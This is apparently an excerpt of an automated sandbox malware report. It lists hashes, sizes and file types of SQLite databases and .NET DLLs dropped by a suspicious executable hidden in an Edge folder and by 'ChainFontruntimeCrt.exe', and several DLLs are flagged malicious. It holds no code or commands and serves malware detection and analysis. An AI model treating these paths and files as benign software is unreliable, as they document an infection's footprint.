                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):25
                                                                                                                      Entropy (8bit):4.323856189774723
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:JoaHANM:Jo2ANM
                                                                                                                      MD5:89523710090839AFCB9149BE9EE5E988
                                                                                                                      SHA1:9ACDB7B27DEF7512B828208F836EE439E082AB34
                                                                                                                      SHA-256:570878B9A2A726D21921042A72F2B5BF48418020A304E50914456D6C5471B8F5
                                                                                                                      SHA-512:6F9CA0F1F84E2C28A75584C21B342127AE7BDA89C42A2BCF2822941F6BA47B993790BFE2AA70FA16F767E323ED4B8AD4C74566F3770B41B6A5B24B61C9AD4EDB
                                                                                                                      Malicious:false
                                                                                                                      Preview:GpKiL42y9oSqawpOjJAwOfhIi
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                       Preview:SQLite format 3
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):5.645950918301459
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32256
                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28160
                                                                                                                      Entropy (8bit):5.570953308352568
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                      MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                      SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                      SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                      SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):24576
                                                                                                                      Entropy (8bit):5.535426842040921
                                                                                                                      Encrypted:false
